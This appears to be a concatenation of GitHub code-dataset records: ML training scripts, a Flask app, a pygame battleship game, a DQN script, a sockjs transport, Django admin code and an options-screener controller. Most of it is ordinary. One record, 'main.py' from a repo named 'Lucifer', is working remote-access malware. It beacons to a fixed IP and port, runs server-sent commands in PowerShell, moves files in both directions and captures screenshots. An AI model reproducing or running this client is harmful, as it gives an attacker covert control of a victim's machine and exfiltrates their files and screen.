num_tokens=num_tokens, depth=depth, remove_last_block=args.remove_last_block, batch_size=batch_size).to(device)\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\n \n #optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate,momentum=.9,weight_decay=1e-4)\n #lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer=optimizer, milestones=[35,48],gamma = 0.1)\n\n if args.tensorboard_dir:\n tensorboard_writer = torch.utils.tensorboard.SummaryWriter(args.tensorboard_dir)\n tensorboard_writer.add_text('args', json.dumps(vars(args)))\n tensorboard_writer.add_text('transform', str(transform))\n else:\n tensorboard_writer = None\n \n init_time = time.time()\n if args.cross_val < 1:\n run(model, optimizer, train_loader, test_loader, args.epochs, args.binary_classification, tensorboard_writer)\n else:\n cross_validate(model, optimizer, train_dataset, test_loader, args.cross_val, args.epochs, transform, args.binary_classification, tensorboard_writer)\n \n minutes, seconds = divmod(time.time() - init_time, 60)\n print('Total execution time:', '{:.0f}m {:.1f}s'.format(minutes, seconds))\n \n#%% Save model\n\n if type(args.model) is str:\n \n if not os.path.exists(args.model):\n os.makedirs(args.model)\n \n torch.save(model.state_dict(), f\"{args.model}/model.pt\")\n","repo_name":"thijswerrij/Transformers-CBIS-DDSM","sub_path":"pretrained_ResViT.py","file_name":"pretrained_ResViT.py","file_ext":"py","file_size_in_byte":12692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"10554063890","text":"from flask import Flask, render_template\nfrom random import randint\nfrom datetime import datetime\nimport requests\n\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef home():\n random_number = randint(1, 10)\n copyright_year = datetime.now().year\n return render_template(\n \"index.html\",\n random_number=random_number,\n copyright_year=copyright_year)\n\n\n@app.route(\"/guess/\")\ndef guess_name(name):\n more_note = None\n if name == \"pt\" or name.lower() == \"phuongthao\":\n age = int(datetime.now().year) - 2003\n gender = \"female\"\n more_note = \"And I think you are very cute\"\n else:\n age_response = requests.get(f\"https://api.agify.io?name={name}\")\n age = age_response.json()[\"age\"]\n gender_response = requests.get(f\"https://api.genderize.io?name={name}\")\n gender = gender_response.json()[\"gender\"]\n return render_template(\n \"guess_by_name.html\",\n name=name,\n gender=gender,\n age=age,\n more_note=more_note\n )\n\n\n@app.route(\"/blog\")\ndef blog():\n requests_url = \"https://api.npoint.io/c790b4d5cab58020d391\"\n response = requests.get(requests_url)\n posts = response.json()\n return render_template(\n \"blog.html\",\n posts=posts,\n )\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n","repo_name":"rememberyourwhy/100daysofCode","sub_path":"Day 57/Instructions/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"4419045443","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport torch.optim.lr_scheduler as lr_scheduler\n\nfrom . import BaseLRScheduler, register_lr_scheduler\n\n__author__ = 'fyabc'\n\n\n@register_lr_scheduler('fixed')\nclass FixedSchedule(BaseLRScheduler):\n \"\"\"Decay the LR on a fixed schedule.\"\"\"\n\n def __init__(self, hparams, optimizer):\n super().__init__(hparams, optimizer)\n self.lr_scheduler = lr_scheduler.LambdaLR(\n self.optimizer.optimizer, self.anneal)\n\n @staticmethod\n def add_args(parser):\n \"\"\"Add arguments to the parser for this LR scheduler.\"\"\"\n parser.add_argument('--force-anneal', '--fa', type=int, metavar='N',\n help='force annealing at specified epoch')\n\n def anneal(self, epoch):\n lrs = self.hparams.lr\n if self.hparams.force_anneal is None or epoch < self.hparams.force_anneal:\n # use fixed LR schedule\n next_lr = lrs[min(epoch, len(lrs) - 1)]\n else:\n # anneal based on lr_shrink\n next_lr = lrs[-1] * self.hparams.lr_shrink ** (epoch + 1 - self.hparams.force_anneal)\n return next_lr / lrs[0] # correct for scaling from LambdaLR\n\n def step(self, epoch, val_loss=None):\n \"\"\"Update the learning rate at the end of the given epoch.\"\"\"\n super().step(epoch, val_loss)\n self.lr_scheduler.step(epoch)\n return self.optimizer.get_lr()\n","repo_name":"renqianluo/NAS4Text","sub_path":"libs/optimizers/lr_schedulers/fixed_schedule.py","file_name":"fixed_schedule.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71878999639","text":"import pygame\nimport sys\nimport os\nfrom time import sleep\nfrom pygame.sprite import Group\n\nfrom field import Field\nfrom button import Button\n\nimport pygame.font\n\ndef check_events(bs_settings, screen, fields, ai_fields, buttons):\n \"\"\"Respond to keypresses and mouse ivents\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_x, mouse_y = pygame.mouse.get_pos()\n check_mousedown_events(bs_settings, screen, fields, ai_fields, buttons, mouse_x, mouse_y)\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, bs_settings)\n # elif event.type == pygame.MOUSEMOTION:\n # check_mousemotion_events(event, bs_settings, screen, fields, buttons)\n \n\ndef check_mousemotion_events(event, bs_settings, screen, fields, buttons):\n x, y = event.pos\n for i in range(10):\n for j in range(10):\n for k in range(4):\n if (( x in range(fields[i][j].rect.x, fields[i][j].rect.x+48)) and (y in range(fields[i][j].rect.y, fields[i][j].rect.y+48))\n and buttons[k].activated_flag == 1 and buttons[k].amount_of_ships > 0 and fields[i][j].status == 0):\n fields[i][j].field_color = (128, 100, 71)\n fields[i][j].border_thickness = 0 \n # if fields[i][j].status == 0:\n # fields[i][j].field_color = (0, 0, 0)\n # fields[i][j].border_thickness = 1\n \n\n\n\ndef check_keydown_events(event, bs_settings):\n \"\"\"Change direction_of_ship_drawing if 'Q' has been pressed\"\"\"\n if event.key == pygame.K_q:\n bs_settings.direction_of_ship_drawing *= -1\n\n\ndef check_mousedown_events(bs_settings, screen, fields, ai_fields, buttons, mouse_x, mouse_y):\n \"\"\"Check collide of point and one of the buttons. Work only if player's ships can be placed\"\"\"\n if buttons[0].amount_of_ships+buttons[1].amount_of_ships+buttons[2].amount_of_ships+buttons[3].amount_of_ships > 0:\n point_and_button_collision(bs_settings, screen, fields, buttons, mouse_x, mouse_y)\n #Make shoot action if all player's ans ai's ships are on the field\n elif buttons[0].amount_of_ships+buttons[1].amount_of_ships+buttons[2].amount_of_ships+buttons[3].amount_of_ships == 0:\n shoot_action(bs_settings, screen, ai_fields, bs_settings.ships[0], mouse_x, mouse_y)\n bs_settings.phase = 1\n\n\n \n \n \n\n\ndef shoot_action(bs_settings, screen, ai_fields, ships, mouse_x, mouse_y):\n\n for m in range(10):\n for j in range(10):\n for one_ship in ships:\n \"\"\"Delete empty lists from ships' list \"\"\"\n if not one_ship:\n ships.remove(one_ship)\n \"\"\"Check if point collide with field and the field is in ships list\"\"\"\n if ai_fields[m][j].rect.collidepoint(mouse_x, mouse_y) and ai_fields[m][j] in one_ship and ai_fields[m][j].status == 2: \n #Play hit sound\n bs_settings.sound_of_hit.play()\n ai_fields[m][j].status = 3\n ai_fields[m][j].field_color = (0, 0, 0)\n ai_fields[m][j].border_thickness = 0\n\n #Remove filed from ship\n one_ship.remove(ai_fields[m][j])\n #If ship has no fileds execute surround_ship function\n if len(one_ship) <= 4:\n surround_ship(bs_settings, screen, ai_fields, one_ship[0], one_ship[1], one_ship[3], one_ship[2], 2, 5, (252,0,13))\n #Delete killed lists from ships' list\n ships.remove(one_ship)\n \n\n #If field is not in ships list activate 'miss' actions\n elif ai_fields[m][j].rect.collidepoint(mouse_x, mouse_y) and (ai_fields[m][j].status == 0 or ai_fields[m][j].status == 1 ):\n #Play miss sound\n bs_settings.sound_of_miss.play()\n\n ai_fields[m][j].status = 3\n ai_fields[m][j].field_color = (252, 0, 13)\n ai_fields[m][j].border_thickness = 5\n #Order changes\n bs_settings.order *= -1\n\ndef point_and_button_collision(bs_settings, screen, fields, buttons, mouse_x, mouse_y):\n for i in range(4):\n if buttons[i].rect.collidepoint(mouse_x, mouse_y) and buttons[i].activated_flag == -1:\n #Change flag to track it's condition\n buttons[i].activated_flag *= -1\n buttons[i].scale_button(2)\n buttons[i].blitme()\n #Set other buttons flags to -1, cause only one button per time can be active\n for j in range(1, 4):\n buttons[i-j].activated_flag = -1\n buttons[i-j].button_color = (0, 255, 0)\n \n #Check and call function to draw ship \n if buttons[i].activated_flag == 1 and buttons[i].amount_of_ships > 0:\n border_thickness = 0\n color = (255, 239, 0)\n draw_ship(bs_settings, screen, fields, buttons, bs_settings.ships[1], i, mouse_x, mouse_y, color, border_thickness)\n\n\n\ndef draw_ship(bs_settings, screen, fields, buttons, ships, i, mouse_x, mouse_y, color=(0,0,0), border_thickness=1):\n #The list store fields of one ship and list itself store in ships from settings.py\n new_ship = []\n\n for m in range(10):\n for j in range(10): \n \"\"\"Check collide of point and one cage of the field and check if cage is already used\"\"\"\n if fields[m][j].rect.collidepoint(mouse_x, mouse_y) and fields[m][j].status == 0:\n fields[m][j].field_color = color #(154, 152, 152)\n fields[m][j].border_thickness = border_thickness \n # Status = 2 means the field is drawn by ship\n fields[m][j].status = 2\n \n\n check_of_the_free_space(bs_settings, screen, fields, buttons, i, j, m)\n\n \"\"\"Add necessary cages for the first cliccked cage to complete ship\"\"\"\n if bs_settings.permission == 1 and bs_settings.direction_of_ship_drawing == 1:\n #Append to the list ship's size\n new_ship.append(buttons[i].ship_size)\n #Append to the list direction of the drawling of the ship\n new_ship.append(bs_settings.direction_of_ship_drawing)\n #Append to the list coordinates of the firs ship's field\n new_ship.append(m)\n new_ship.append(j)\n #Append to the list field of the ship\n new_ship.append(fields[m][j])\n\n for k in range(1, buttons[i].ship_size):\n fields[m][j+k].field_color = color \n fields[m][j+k].border_thickness = border_thickness \n fields[m][j+k].status = 2\n #Append to the list field of the ship\n new_ship.append(fields[m][j+k])\n\n \n elif bs_settings.permission == 1 and bs_settings.direction_of_ship_drawing == -1:\n #Append to the list ship's size\n new_ship.append(buttons[i].ship_size)\n #Append to the list direction of the drawling of the ship\n new_ship.append(bs_settings.direction_of_ship_drawing)\n #Append to the ships list coordinates of the firs ship's field\n new_ship.append(m)\n new_ship.append(j)\n #Append to the list field of the ship\n new_ship.append(fields[m][j])\n \n for k in range(1, buttons[i].ship_size):\n fields[m+k][j].field_color = color \n fields[m+k][j].border_thickness = border_thickness\n fields[m+k][j].status = 2\n #Append to the list field of the ship\n new_ship.append(fields[m+k][j])\n\n \n \n\n \"\"\"Surround ship for escaping collisions\"\"\"\n if bs_settings.permission == 1:\n surround_ship(bs_settings, screen, fields, buttons[i].ship_size, bs_settings.direction_of_ship_drawing, j, m, 1)\n\n \n buttons[i].amount_of_ships -= 1\n bs_settings.permission = 0\n #Append to the ships list size and fields of new ship \n ships.append(new_ship)\n\ndef surround_ship(bs_settings, screen, fields, ship_size, direction_of_ship_drawing, j, m, status, border_thickness = 1, field_color = (0,0,0)):\n \"\"\"Surround ship by non-active fileds for ships cant be placed close to each other.\n Function get postion of the first field of the ship, size and direction and surround ship according to them \n \"\"\"\n if direction_of_ship_drawing == 1:\n #Surround by x coordinate\n for jteration in range(-1, 2, 2):\n for iteration in range(-1, ship_size+1):\n #try if ship's surronding out of game field\n try:\n if j+iteration>= 0 and m+jteration >= 0:\n fields[m+jteration][j+iteration].border_thickness = border_thickness\n fields[m+jteration][j+iteration].field_color = field_color\n fields[m+jteration][j+iteration].status = status\n except IndexError:\n break\n #Surround by y coordinate\n for iteration in range(-1, ship_size+1, ship_size+1):\n #try if ship's surronding out of game field\n try: \n if j+iteration>= 0:\n fields[m][j+iteration].border_thickness = border_thickness\n fields[m][j+iteration].field_color = field_color\n fields[m][j+iteration].status = status\n except IndexError:\n break\n\n elif direction_of_ship_drawing == -1:\n #Surround by y coordinate\n for jteration in range(-1, 2, 2):\n for iteration in range(-1, ship_size+1):\n #try if ship's surronding out of game field\n try:\n if m+iteration >= 0 and j+jteration >= 0:\n fields[m+iteration][j+jteration].border_thickness = border_thickness\n fields[m+iteration][j+jteration].field_color = field_color\n fields[m+iteration][j+jteration].status = status\n except IndexError:\n break\n #Surround by x coordinate\n for iteration in range(-1, ship_size+1, ship_size+1):\n #try if ship's surronding out of game field\n try:\n if m+iteration >= 0:\n fields[m+iteration][j].border_thickness = border_thickness\n fields[m+iteration][j].field_color = field_color\n fields[m+iteration][j].status = status\n except IndexError:\n break\n\n\n\n \n \ndef check_of_the_free_space(bs_settings, screen, fields, buttons, i, j, m):\n \"\"\"Check if cages have alredy occupied. If it so cancel previous 'If' action\"\"\"\n if buttons[i].ship_size == 1:\n bs_settings.permission = 1\n #try if ship out of game field\n try:\n if bs_settings.direction_of_ship_drawing == 1: \n for k in range(1, buttons[i].ship_size):\n if fields[m][j+k].status != 0:\n fields[m][j].field_color = (0, 0, 0)\n fields[m][j].border_thickness = 1\n fields[m][j].status = 0\n buttons[i].amount_of_ships += 1\n bs_settings.permission = 0\n break \n else:\n bs_settings.permission = 1\n\n\n elif bs_settings.direction_of_ship_drawing == -1:\n for k in range(1, buttons[i].ship_size):\n if fields[m+k][j].status != 0:\n fields[m][j].field_color = (0, 0, 0)\n fields[m][j].border_thickness = 1\n fields[m][j].status = 0\n buttons[i].amount_of_ships += 1\n bs_settings.permission = 0\n break \n else:\n bs_settings.permission = 1\n except IndexError:\n bs_settings.permission = 0\n fields[m][j].field_color = (0, 0, 0)\n fields[m][j].border_thickness = 1\n fields[m][j].status = 0\n buttons[i].amount_of_ships += 1\n bs_settings.permission = 0\n\n\n\n\n\ndef update_screen(bs_settings, screen, fields, ai_fields, buttons, layout):\n #Redraw the screen during each pass thruogh the loop\n screen.fill(bs_settings.bg_color)\n\n if bs_settings.end_game == 1:\n layout.draw_layout()\n\n \n #Draw player's field\n for i in fields:\n for one_field in i:\n one_field.draw_field()\n #Draw ai's field\n for j in ai_fields:\n for one_ai_field in j:\n one_ai_field.draw_field()\n #Draw buttons\n for one_button in buttons:\n one_button.blitme()\n prep_text(bs_settings, screen, 'Game rules:', 380)\n prep_text(bs_settings, screen, '1. Place your ships on the right field.', 400)\n prep_text(bs_settings, screen, ' Use the Q key to cahange their position', 420)\n prep_text(bs_settings, screen, \"2. Destroy all of your opponent's ships\", 440)\n prep_text(bs_settings, screen, \" by shooting at the left field\", 460)\n\n\n\n #Make the most recently drawn visible\n pygame.display.flip()\n\n\n#Make an list of player's field\ndef create_game_field_1(bs_settings, screen, fields):\n for i in range(10):\n fields.append([])\n for j in range(10):\n new_field = Field(bs_settings, screen)\n new_field.rect.y += 48 * i\n new_field.rect.x += 48 * j\n fields[i].append(new_field)\n\n\n#Make an array of ai's field\ndef create_game_field_2(bs_settings, screen, ai_fields):\n for i in range(10):\n ai_fields.append([])\n for j in range(10):\n #Define new coordinates for ai's field\n new_field = Field(bs_settings, screen)\n new_field.rect.y = 0\n new_field.rect.x = 0\n new_field.rect.y += 48 * i\n new_field.rect.x += 48 * j\n ai_fields[i].append(new_field)\n\n\ndef create_buttons(bs_settings, screen):\n #Initialize buttons\n buttons = []\n\n for button in bs_settings.buttons_settings.keys():\n value = bs_settings.buttons_settings.get(button)\n #Initialize new Button object\n new_button = Button(bs_settings, screen)#, value[5], 18)\n \"\"\"Define unique values of the new button\"\"\"\n #Give image to the ship\n new_button.get_image(value[2]) \n new_button.rect.x = value[0]\n new_button.rect.y = value[1] \n new_button.ship_size = value[3]\n new_button.amount_of_ships = value[4]\n new_button.prep_text(button)\n #Add the new button to buttons list\n buttons.append(new_button)\n\n return buttons\n \n\ndef end_game_check(bs_settings, screen, buttons, layout):\n \"\"\"Check if all ships of one side are destoyed and ending game\"\"\"\n #Check if all ships are placed\n if buttons[0].amount_of_ships == 0 and buttons[1].amount_of_ships == 0 and buttons[2].amount_of_ships == 0 and buttons[3].amount_of_ships == 0:\n for i in range(2):\n if not bs_settings.ships[i]:\n bs_settings.end_game = 1\n layout.prep_msg(bs_settings.end_msg[i])\n\n\n\n\n \n\n\n\ndef prep_text(bs_settings, screen, msg, centry):\n screen = screen\n screen_rect = screen.get_rect()\n\n font = pygame.font.Font(os.path.join('images', 'freesansbold.ttf'), 13)\n textimage = font.render(str(msg), True,\n (30, 30, 30))\n\n text_rect = textimage.get_rect()\n text_rect.centery = centry\n text_rect.left = 485\n screen.blit(textimage, text_rect)\n \n\n\n\n\n\n\n\n\n \n \n ","repo_name":"KurtVobain/battleship","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":16226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"6761403300","text":"\"\"\"\nFaça um programa que gere um número aleátorio entre 0 e 50 e o usuário deve acertá-lo\n\"\"\"\n\nfrom random import randint\nfrom time import sleep\n\nmaquina = randint(0 , 50)\ncont = 0\nprint (\"GERANDO UM NÚMERO ENTRE 0 E 50...\")\nprint (\"-\"*40)\nsleep (2.5)\nprint (\"TENTE ADVINHAR NO NUMERO QUE PENSEI\")\n\nwhile True:\n numero = int(input(\"Digite o número que você deseja: \"))\n if numero < 0 or numero > 50:\n print (\"Numéro inválido. Tente novamente!\")\n else:\n if numero == maquina:\n print (\"Você acertou o número!\")\n print (\"Número de tentativas: {}\".format(cont))\n break\n else:\n if numero < maquina:\n print (\"Quasee! Tente um número um pouco mais pra cima\")\n cont = cont + 1\n else:\n print (\"Quasee! Tente um número um pouco mais pra baixo\")\n cont = cont + 1\n","repo_name":"igornunes7/Python","sub_path":"basico09.py","file_name":"basico09.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"22643330077","text":"import numpy as np\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nfrom torch.optim import Adam\nimport gym\nimport gym_maze\nimport sys\nimport time\n\nclass ReplayMemory:\n # capacity is approximately 100MB\n # def __init__(self, size=27000, shape=(10, 10, 9)):\n def __init__(self, size=5000, shape=(5, 5, 8)):\n self.size = size\n self.reward = np.zeros(size)\n self.first_state = np.zeros((size,) + shape)\n self.second_state = np.zeros((size,) + shape)\n self.action = np.zeros(size)\n self.position = 0\n self.full = False\n\n def push(self, first_state, action, reward, second_state):\n self.first_state[self.position, :,:,:] = first_state\n self.second_state[self.position, :,:,:] = second_state\n # self.first_state[self.position, :,:] = first_state\n # self.second_state[self.position, :,:] = second_state\n self.action[self.position] = action\n self.reward[self.position] = reward\n self.position = (self.position + 1) % self.size\n if self.position == self.size - 1:\n self.full = True\n\n def sample(self, batch_size):\n ind = np.random.randint(0, len(self), batch_size)\n return self.first_state[ind], self.action[ind], \\\n self.reward[ind], self.second_state[ind]\n\n def last(self):\n return self.first_state[self.position-1], self.action[self.position-1], \\\n self.reward[self.position-1], self.second_state[self.position-1]\n\n def __len__(self):\n if self.full:\n return self.size\n return self.position\n\n\nclass DQN(nn.Module):\n def __init__(self):\n super(DQN, self).__init__()\n self.conv1 = nn.Conv2d(8, 8, kernel_size=3, stride=1, padding=1)\n self.lin = nn.Linear(200, 4)\n\n def forward(self, x):\n # x = self.lin(x.view(x.size(0), -1))\n # return x.view(x.size(0), 4)\n x = x.permute(0, 3, 1, 2)\n x = self.conv1(x)\n x = self.lin(x.view(x.size(0), 200))\n # x = F.relu(self.bn1(self.conv1(x)))\n # x = F.relu(self.bn2(self.conv2(x)))\n # x = F.relu(self.bn3(self.conv3(x)))\n # x = self.conv4(x)\n return x.view(x.size(0), -1)\n\ndef select_action(model, state):\n # start with e-greedy\n epsilon = 0.1\n if np.random.uniform() > epsilon:\n return model(state).data.max(1)[1].numpy()[0]\n else:\n return np.random.randint(4)\n\nnp.random.seed(10)\nenvs = [gym.make('small-maze-{}-v0'.format(i)) for i in range(10)]\nmems = [ReplayMemory() for i in range(10)]\n\ndqn = DQN().train()\noptimizer = Adam(dqn.parameters())\nbatch_size = 10\ngamma = 0.99\n\nepisode_steps = []\n\nnum_episodes = 100\nfor i_episode in range(num_episodes):\n state = env.reset()\n t = 0\n done = False\n total_reward = 0\n\n while not done and t < 2000:\n # acting\n # state_variable = Variable(torch.from_numpy(state[np.newaxis,:,:].astype('float32')))\n\n state_variable = Variable(torch.from_numpy(state[np.newaxis,:,:,:].astype('float32')))\n action = select_action(dqn, state_variable)\n next_state, reward, done, _ = env.step(action)\n\n\n total_reward += reward * gamma ** t\n memory.push(state, action, reward, next_state)\n state = np.copy(next_state)\n\n if i_episode > 50:\n env.render()\n # training\n state_batch, action_batch, reward_batch, next_state_batch = memory.sample(batch_size)\n\n action_batch = action_batch.reshape(batch_size,1)\n state_batch = Variable(torch.from_numpy(state_batch.astype('float32')))\n action_batch = Variable(torch.from_numpy(action_batch.astype('int64')))\n reward_batch = Variable(torch.from_numpy(reward_batch.astype('float32')))\n next_state_batch = Variable(torch.from_numpy(next_state_batch.astype('float32')))\n next_state_values = dqn(next_state_batch).max(1)[0]\n state_action_values = dqn(state_batch).gather(1, action_batch)\n\n expected_state_action_values = (next_state_values * gamma) + reward_batch\n\n loss = F.smooth_l1_loss(state_action_values, expected_state_action_values.detach())\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n t += 1\n\n print('done', t, 'steps', total_reward, 'reward')\n\n# import matplotlib.pyplot as plt\n\n# plt.plot(episode_steps)\n# plt.savefig('/Users/user/Desktop/foo.png')\n# dqn = DQN()\n# dqn(Variable(torch.from_numpy(np.zeros((1,10,10,9), dtype='float32'))))\n","repo_name":"dcbyrnes/Exploration","sub_path":"dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"4738332233","text":"import socket\nimport subprocess\nimport time\nimport os\nimport pyautogui\nfrom datetime import datetime\n\n\ndef main():\n # initial config\n eof = \"\"\n end_result = \"\"\n chunk_size = 2048\n server_address = (\"192.168.8.102\", 8091)\n\n while True:\n try:\n # create a client\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print(\"connecting to server...\", server_address)\n\n # trying to connect with the server\n client_socket.connect(server_address)\n\n while True:\n # receive a command from server\n command = client_socket.recv(1024).decode()\n\n # change path\n if command.startswith(\"cd\") or len(command) == 2 and command[0].isalpha() and command[1] == \":\":\n change_path(command)\n continue\n\n elif command.startswith(\"download \"):\n file_name = command.split(' ', 1)[1]\n\n # check if file is exist to send it to server\n if os.path.exists(file_name):\n exists = \"yes\"\n client_socket.send(exists.encode())\n send_file(file_name, client_socket, eof, chunk_size)\n continue\n\n elif command.startswith(\"upload\"):\n exists = client_socket.recv(1024)\n\n if exists.decode() == \"yes\":\n answer = \"yes\"\n client_socket.send(answer.encode())\n file_name = command.split(' ', 1)[1]\n\n save_file(file_name, client_socket, eof, chunk_size)\n\n continue\n\n elif command == \"screenshot\":\n\n screenshot = take_screenshot()\n\n client_socket.send(screenshot.encode())\n\n if os.path.exists(screenshot):\n exists = \"yes\"\n client_socket.send(exists.encode())\n answer = client_socket.recv(1024)\n if answer.decode() == \"yes\":\n send_file(screenshot, client_socket, eof, chunk_size)\n\n print(\"File sent successfully\")\n os.remove(screenshot)\n continue\n\n elif command == \"\":\n continue\n\n else:\n execute_command(client_socket, command, end_result)\n\n\n except Exception:\n print(\"can't connect to server\")\n time.sleep(3)\n\n\ndef change_path(command):\n path = command.split(' ', 1)[1] if command.startswith(\"cd\") else command\n if os.path.exists(path):\n os.chdir(path)\n\n\ndef send_file(file_name, client_socket, eof, chunk_size):\n with open(file_name, \"rb\") as file:\n chunk = file.read(chunk_size)\n while len(chunk) > 0:\n client_socket.send(chunk)\n chunk = file.read(2048)\n client_socket.send(eof.encode())\n print(\"File sent successfully\")\n\n\ndef save_file(file_name, client_socket, eof, chunk_size):\n with open(file_name, \"wb\") as download_file:\n print(\"Downloading file\")\n while True:\n chunk = client_socket.recv(chunk_size)\n if chunk.endswith(eof.encode()):\n chunk = chunk[:-len(eof)]\n download_file.write(chunk)\n break\n download_file.write(chunk)\n print(\"File Downloaded successfully\")\n\n\ndef take_screenshot():\n now = datetime.now()\n # unique name\n now = now.strftime(\"%m-%d-%Y-%H.%M.%S\")\n print(\"Take Screenshot\")\n screen = pyautogui.screenshot()\n screen.save(\"\" + now + '.png')\n print(\"Screenshot Saved\")\n screenshot = now + '.png'\n return screenshot\n\n\ndef execute_command(client_socket, command, end_result):\n output = subprocess.run([\"powershell.exe\", command], shell=True, capture_output=True,\n stdin=subprocess.DEVNULL)\n if output.stderr.decode(\"utf-8\") == \"\":\n result = output.stdout\n result = result.decode(\"utf-8\") + end_result\n result = result.encode(\"utf-8\")\n elif output.stderr.decode(\"utf-8\") != \"\":\n result = output.stderr\n result = result.decode(\"utf-8\") + end_result\n result = result.encode(\"utf-8\")\n client_socket.sendall(result)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"LoaiAlqatanani/Lucifer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"15698180573","text":"\"\"\" iframe-eventsource transport \"\"\"\nfrom aiohttp import web, hdrs\nfrom sockjs.protocol import ENCODING\n\nfrom .base import StreamingTransport\nfrom .utils import CACHE_CONTROL, session_cookie\n\n\nclass EventsourceTransport(StreamingTransport):\n async def send(self, text):\n blob = \"\".join((\"data: \", text, \"\\r\\n\\r\\n\")).encode(ENCODING)\n await self.response.write(blob)\n\n self.size += len(blob)\n if self.size > self.maxsize:\n return True\n else:\n return False\n\n async def process(self):\n headers = (\n (hdrs.CONTENT_TYPE, \"text/event-stream\"),\n (hdrs.CACHE_CONTROL, CACHE_CONTROL),\n )\n headers += session_cookie(self.request)\n\n # open sequence (sockjs protocol)\n resp = self.response = web.StreamResponse(headers=headers)\n await resp.prepare(self.request)\n await resp.write(b\"\\r\\n\")\n\n # handle session\n await self.handle_session()\n\n return resp\n","repo_name":"aio-libs/sockjs","sub_path":"sockjs/transports/eventsource.py","file_name":"eventsource.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"85"} +{"seq_id":"72136696918","text":"from django.contrib import admin\nfrom .models import Hospital, AppointmentSlot\n\n# Register your models here.\n\nclass HospitalAdministration(admin.ModelAdmin):\n list_display = (\"name\", \"location\", \"specialty\",)\n list_filter = list_display\n\nclass AppointmentSlotAdministration(admin.ModelAdmin):\n list_display = (\n \"hospital\",\n \"start\", \n \"end\", \n \"general_user\", \n \"hospital_staff\",\n \"status\",\n )\n search_fields = list_display\n list_filter = list_display\n\nadmin.site.register(Hospital, HospitalAdministration)\nadmin.site.register(AppointmentSlot, AppointmentSlotAdministration)\n","repo_name":"Lifespark-Technologies/Infomed","sub_path":"hospitals/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"23455591805","text":"#짝수와 홀수\ndef solution(num):\n answer = \"\"\n if num % 2 == 0 or num == 0:\n answer = \"Even\"\n elif num % 2 == 1:\n answer = \"Odd\"\n return answer\n\n#Test Case\nret = solution(3)\nprint(ret)\nret = solution(4)\nprint(ret)","repo_name":"plmqazoknijb/pythonCodingTest","sub_path":"Lv_1/220103.py","file_name":"220103.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"25617410214","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*- \n# Author: Ryan\n# @Time: 2018/3/24 上午11:43\n\nimport queue\n\nclass TreeNode(object):\n def __init__(self,val,left=None,right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass BinaryTree(object):\n def __init__(self,root=None):\n self.root = root\n def breathSearch(self):\n if self.root == None:\n return None\n retList = []\n q = queue.Queue() #创建了一个队列\n q.put(self.root) #将根结点放入队列中\n #只要队列不为空,则遍历节点,并分别把左子节点和右子节点放入列表中\n while q.empty() is not True:\n node = q.get()\n retList.append(node.var)\n\n if node.left != None:\n q.put(node.left)\n if node.right != None:\n q.put(node.right)\n return retList\n\n\n\n\n","repo_name":"Ryan111111/DataStructure_python","sub_path":"树的广度优先遍历.py","file_name":"树的广度优先遍历.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"28068140020","text":"\"\"\" Options Screener Controller Module \"\"\"\n__docformat__ = \"numpy\"\n\nimport argparse\nimport logging\nfrom typing import List\n\nfrom openbb_terminal import feature_flags as obbff\nfrom openbb_terminal.custom_prompt_toolkit import NestedCompleter\nfrom openbb_terminal.decorators import log_start_end\nfrom openbb_terminal.helper_funcs import EXPORT_ONLY_RAW_DATA_ALLOWED, check_positive\nfrom openbb_terminal.menu import session\nfrom openbb_terminal.parent_classes import BaseController\nfrom openbb_terminal.rich_config import MenuText, console\nfrom openbb_terminal.stocks.comparison_analysis import ca_controller\nfrom openbb_terminal.stocks.options.screen import syncretism_model, syncretism_view\n\n# pylint: disable=E1121\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass ScreenerController(BaseController):\n \"\"\"Screener Controller class\"\"\"\n\n CHOICES_COMMANDS = [\"view\", \"set\", \"scr\"]\n CHOICES_MENUS = [\n \"ca\",\n ]\n\n preset_choices = syncretism_model.get_preset_choices()\n\n PATH = \"/stocks/options/screen/\"\n\n def __init__(self, queue: List[str] = None):\n \"\"\"Constructor\"\"\"\n super().__init__(queue)\n\n self.preset = 